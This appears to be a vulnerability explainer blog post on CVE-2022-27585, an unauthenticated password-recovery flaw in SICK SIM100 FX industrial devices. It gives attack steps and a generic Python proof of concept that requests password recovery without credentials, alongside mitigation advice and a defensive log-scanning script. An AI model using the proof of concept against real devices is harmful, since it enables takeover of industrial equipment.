In industrial automation, security holes can have massive impacts on businesses and safety. Today, we will walk you through a serious vulnerability tracked as CVE-2022-27585, affecting SICK SIM100 FX devices (part numbers 1097816 and 1097817) with firmware versions earlier than 1.6. This bug lets an unauthenticated attacker remotely recover passwords and elevate privileges by abusing the built-in recovery function, with no advanced hacking skills needed.
In this post, you'll learn how the exploit works, see code snippets, and get advice on how to patch your system. The explanation is written in plain language so that everyone can follow it. For official details, check out the SICK security advisory.
What's the Vulnerability?
CVE-2022-27585 is a flaw in the password recovery mechanism of SICK SIM100 FX devices running firmware below version 1.6. The device lets *anyone* on the network invoke the password recovery method, with no login required. A remote attacker can therefore reset or recover the password of the account tied to the configured "RecoverableUserLevel", which should only be reachable with higher privileges, and then take unauthorized control of the device with that level's rights.
Risk: The attacker gains the level of access defined by RecoverableUserLevel, which allows configuration changes, data extraction, or even disabling or manipulating the system. This can disrupt operations and poses a safety risk if your setup is part of a critical process.
Summary Table
| Impacted Products | Firmware Versions | Fixed in (>=) |
|-----------------------------------|-------------------|---------------|
| SICK SIM100 FX (1097816, 1097817) | < 1.6             | 1.6           |
How Does the Attack Work?
The problem is that the password recovery functionality (intended for legitimate users who forgot their passwords) can be triggered remotely by anyone. Hackers can script access to this functionality using the exposed API or web interfaces.
Step-by-step
1. Find the Device: The attacker locates reachable SICK SIM100 FX devices, e.g., via Shodan or by scanning network ranges.
2. Invoke Password Recovery: Without authenticating, the attacker sends a crafted request to the password recovery endpoint.
3. Obtain or Reset Password: The device hands the attacker a reset password, or a way to recover the existing one, for whichever account is mapped to RecoverableUserLevel. From that point the attacker holds that level's privileges.
Proof-of-Concept Exploit
Let’s see a sample Python snippet that could be used by attackers to trigger the vulnerability (modify with the real endpoint):
```python
import requests

# Target SICK SIM100 FX device IP (example address)
target_ip = "192.168.1.100"
# Placeholder endpoint: substitute the device's real password-recovery path
url = f"http://{target_ip}/api/password-recovery"

# Example payload; the real parameter names depend on the device
payload = {
    "username": "admin"  # or whichever account maps to RecoverableUserLevel
}

try:
    # No session cookie, token or credentials are sent: that is the bug
    resp = requests.post(url, json=payload, timeout=5)
except requests.RequestException as exc:
    raise SystemExit(f"[-] Request failed: {exc}")

if resp.status_code == 200:
    print(f"[+] Password Recovery Data: {resp.text}")
else:
    print(f"[-] Failed: {resp.status_code}")
```
*Note*: This is a generic example! The actual endpoint, parameters, and response vary by device and configuration; the point it illustrates is that the request carries no credentials at all.
Impact
- Steal Sensitive Data: Extract logs, credentials, or other operational information.
- Disrupt Operations: Disable device outputs, induce failures, or pivot further into the network.
- Repeat Attack: Since the flaw is deterministic, attackers can exploit unpatched devices again and again.
Mitigation
- Upgrade the firmware to version 1.6 or later.
- Get the latest firmware from the SICK Support Portal.
- If you can't upgrade right away, restrict network access to the device: put it behind a VPN or firewall so only maintenance hosts can reach it, or air-gap it.
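To make the two mitigation steps above actionable, here is an added example (not code from the original post or from SICK) that triages an asset inventory for devices still in the vulnerable range and scans web access logs for hits on the recovery endpoint from outside the maintenance network. It assumes a hypothetical endpoint path "/api/password-recovery" (the same placeholder the PoC uses; substitute the real path), a combined-log style log format, and 10.10.50.0/24 as the only network allowed to reach the device. The inventory rows and log lines are constructed sample data.

```python
"""Added example: vulnerable-range triage and recovery-endpoint log scan.

Assumptions (hypothetical, for illustration only):
  * RECOVERY_PATH is the placeholder endpoint from the PoC above;
  * log lines look like: client - - [ts] "METHOD path HTTP/x" status
  * only ALLOWED_CIDR should ever talk to the device.
"""
import ipaddress
import re

AFFECTED_PART_NUMBERS = {"1097816", "1097817"}   # from the advisory
FIXED_VERSION = (1, 6)                             # firmware 1.6 contains the fix
RECOVERY_PATH = "/api/password-recovery"           # hypothetical placeholder


def parse_version(version: str) -> tuple:
    """Turn '1.5.2', 'V1.6.0' or '1.6' into a comparable tuple of ints."""
    nums = re.findall(r"\d+", version)
    if not nums:
        raise ValueError(f"unparseable firmware version: {version!r}")
    return tuple(int(n) for n in nums)


def is_affected(part_number, firmware: str) -> bool:
    """True if the part number is in scope and the firmware predates 1.6."""
    if str(part_number) not in AFFECTED_PART_NUMBERS:
        return False
    v = parse_version(firmware)
    # Pad both tuples so (1, 6) and (1, 6, 0) compare as equal
    width = max(len(v), len(FIXED_VERSION))
    v = v + (0,) * (width - len(v))
    fixed = FIXED_VERSION + (0,) * (width - len(FIXED_VERSION))
    return v < fixed


def triage_inventory(inventory):
    """Return the inventory rows that still need the 1.6 upgrade."""
    return [r for r in inventory if is_affected(r["part_number"], r["firmware"])]


LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def flag_recovery_requests(log_lines, allowed_cidr: str):
    """Return (client_ip, timestamp, status) for every recovery-endpoint hit
    from a client outside allowed_cidr. A 200 from a foreign client is the
    strongest sign that an unauthenticated recovery call succeeded."""
    allowed = ipaddress.ip_network(allowed_cidr)
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                   # skip unparseable lines
        if m["path"].split("?")[0] != RECOVERY_PATH:
            continue                                   # not the recovery endpoint
        if ipaddress.ip_address(m["ip"]) in allowed:
            continue                                   # maintenance host, expected
        hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits


# Constructed sample data (not real devices, not real traffic)
SAMPLE_INVENTORY = [
    {"host": "sim-line1", "part_number": "1097816", "firmware": "1.5.2"},
    {"host": "sim-line2", "part_number": "1097817", "firmware": "V1.6.0"},
    {"host": "sim-line3", "part_number": "1097817", "firmware": "1.6"},
    {"host": "other-plc", "part_number": "1234567", "firmware": "1.0"},
]

SAMPLE_LOG = [
    '10.10.50.7 - - [12/Mar/2023:08:01:10 +0000] "GET /status HTTP/1.1" 200',
    '10.10.50.7 - - [12/Mar/2023:08:02:33 +0000] "POST /api/password-recovery HTTP/1.1" 200',
    '198.51.100.23 - - [12/Mar/2023:08:05:41 +0000] "POST /api/password-recovery HTTP/1.1" 200',
    '198.51.100.23 - - [12/Mar/2023:08:05:42 +0000] "POST /api/password-recovery?user=admin HTTP/1.1" 401',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for row in triage_inventory(SAMPLE_INVENTORY):
        print(f"[!] {row['host']} ({row['part_number']}) on {row['firmware']} needs 1.6 or later")
    for ip, ts, status in flag_recovery_requests(SAMPLE_LOG, "10.10.50.0/24"):
        print(f"[!] recovery endpoint hit from {ip} at {ts} (HTTP {status})")
```

Run it as a script to see both reports; on the sample data only sim-line1 is flagged for upgrade, and the two requests from 198.51.100.23 are flagged because that address is outside the maintenance subnet. Feed `flag_recovery_requests` your reverse proxy or firewall HTTP logs while the devices remain unpatched; any hit at all from outside the allowed network is worth an incident ticket, whatever the status code.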
Link to Official Advisory:
- SICK Product Security Advisory – CVE-2022-27585
Good Practice:
- Disable unused accounts/levels if possible, and, if the device lets you configure RecoverableUserLevel, set it to the least privileged level that still meets your recovery needs, since that level is exactly what an attacker gains.
Conclusion
CVE-2022-27585 is a critical security bug in SICK SIM100 FX devices that gives any remote, unauthenticated user access to the password recovery function, making privilege escalation trivial. If you use these devices, upgrade your firmware to 1.6 or later immediately and restrict network access wherever possible. This issue is easy to exploit and likely to be targeted by automated attacks.
Stay safe!
*For more technical details or help, check the vendor documentation or reach out to your SICK support contact.*
Reference Links
- SICK Security Portal
- CVE Details: CVE-2022-27585
*You are welcome to share this post to alert others in your organization or network.*
Timeline
Published on: 11/01/2022 21:15:00 UTC
Last modified on: 03/31/2023 16:06:00 UTC